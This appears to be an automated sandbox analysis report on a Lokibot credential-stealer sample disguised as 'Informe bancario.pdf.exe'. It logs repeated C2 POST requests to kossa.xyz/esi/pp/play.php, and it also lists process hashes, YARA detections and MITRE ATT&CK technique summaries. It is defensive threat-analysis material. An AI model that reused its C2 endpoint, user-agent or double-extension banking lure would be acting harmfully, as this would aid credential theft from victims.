Jun 23, 2022 17:56:09.034661055 CEST	12625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxjygSRG8X%2FkV9bKGg9vKcukGQQMsZciUlD4EA%2FbKAdKhbAsUZHriNrmaDnwEjlvhCO2v0dr40IU6hwQz7EKgiICOz%2FwZ8BGMfZL6ripgHen%2FVFAblBWSK3ZE5M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe697a2bb27774-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49876	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:11.073086023 CEST	12626	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:11.421587944 CEST	12627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vKWHn%2FyKZfK22jYwkSiqKJ3lNebyDNlMqc2uTH%2FWPL1CsEeS2wXJq7O8RBu3uo9kCAL4JgpjGnEOG2LPOeL7%2BiITMPF9gEE91z1aYp%2FlObWTDWMy78vsHq6Twg0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe698938c9903a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49877	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:13.789082050 CEST	12628	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:14.167265892 CEST	12629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndR9ZCTJ1N11vjX%2Fx0YEz6iEdBcRwRBrFLR63RkojfAusVr7m8LQjcOnDZVKgChgIGzkLUZ6xRoemhHdLPRFdThTivALoGspyfOiDAiawxUfm5e3PqNs0e6Xj8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe699a38fd8926-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49881	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:16.928508997 CEST	12638	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:17.284101009 CEST	12640	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvokBvlFU7rHymLkT5aDrY0YFW9JOrqKdEQDAYp28XRPOV9nTidnZuNJsuZx2Ecpe%2BgluEOIUHEw87efs71zeLfR5jQPOg72GppPSuamirQio2LGHZU2xFJ7Yd4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69addd1cbbcb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49882	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:19.809047937 CEST	12641	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:20.189312935 CEST	12642	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=49za7TeTSY%2BScp3L3mbuGYQSzA8lKA0u3%2ByMCtjhTcKDSwymE1%2FJodRsLTRHciEX8Kq0Ra9aNOm%2Ffy2I42Ob1ewYWyfNEryyYANBw%2BmQa%2BV%2F4yBU3%2BqCKwbOKrI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69bfdc4a4052-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49883	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:20.757704973 CEST	12642	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:21.122421980 CEST	12643	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtFAq1al83O%2FV%2B92iHB%2Bvj41q9z52fvvYULnr9pnDvcrgcXCZbRd%2Fg8PwqQ5%2B7osAmwSr8ZWHiJJHImkp%2FDMHhxFGmlMluudAzgI7dcN3u2RlpiJ3WS3kpCUnMU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69c5cf035bdd-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49746	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:42.346945047 CEST	1155	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:42.724734068 CEST	1156	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5YyEf0yuwnHwY6Ol0zSUHeAlII5yG%2BtbGShw%2FjBJg5diEWvZQfKwCUTDIJxxICscixc6esDrhJtzgAn7OPqg90dV5gKlSdKD%2FW1lVNU2OPU2c2jZDcVkVCMggc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe675ebf0c073a-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49747	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:44.305986881 CEST	1156	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:44.695508003 CEST	1157	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vEgpr3LOSViFW7U4tH4ppo5INxAD%2BZ%2BN3%2B9UVagKYbUpMETFO48oULBbA5Kr9X056uTqcm%2FIwqhHqd4PEs2vhrZ3QbZ0ozxdU95eKTCIQP9hp9TaTmBW0Aq1vrM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe676afa967686-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49749	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:47.375833988 CEST	1170	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:47.760540009 CEST	1189	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F4Nqrt%2F5hGOyJxDUSwRw%2BU5zDViLSlLSg6wN6Ng%2FzguYQrkaT0UJAvGfoYFQZVGyEo1S7j15L1Is6rYnPqlyrbhlgioaEvmmmIssIyRqN3JfPx8ufigGYDLb8aE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe677e2a1e71e6-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49757	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:50.135453939 CEST	1286	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:50.515275002 CEST	1300	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5xx1f%2BZB0Bg5SOjVIWnyu0GmHyG%2FMUBT0%2BClXCf6KEUUmDyR9H%2B5JAFdWPy4E49JxTYPuBPHW9AXlJtc1VrtPim5jOrGLb2ysNW1ZTe9KdOAJZLg%2FJq0FsNYDNM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe678f6e537519-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49762	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:52.263394117 CEST	1323	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:52.635915995 CEST	1324	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l8gl5ethGM613nbIJMkijjldEfcAImSZ1NC%2BMhhEPi8o59DvPMewQifZG5OunxAQsmWlHRTeAIKHni0o%2BThHW2lo09mMKEmROFUNb7SzQ9dbI6%2B8whjK%2B5OwLtQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe679cbdb876d2-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	17:54:11
Start date:	23/06/2022
Path:	C:\Users\user\Desktop\Informe bancario.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Informe bancario.pdf.exe"
Imagebase:	0x4b0000
File size:	497664 bytes
MD5 hash:	603FE9A434DA79407213DB7D4B907789
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: Informe bancario.pdf.exePID: 6800, Parent PID: 6496

General

Target ID:	4
Start time:	17:54:23
Start date:	23/06/2022
Path:	C:\Users\user\Desktop\Informe bancario.pdf.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Informe bancario.pdf.exe
Imagebase:	0x2b0000
File size:	497664 bytes
MD5 hash:	603FE9A434DA79407213DB7D4B907789
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: Informe bancario.pdf.exePID: 6824, Parent PID: 6496

General

Target ID:	5
Start time:	17:54:25
Start date:	23/06/2022
Path:	C:\Users\user\Desktop\Informe bancario.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Informe bancario.pdf.exe
Imagebase:	0x6e0000
File size:	497664 bytes
MD5 hash:	603FE9A434DA79407213DB7D4B907789
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Disassembly

⊘No disassembly

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
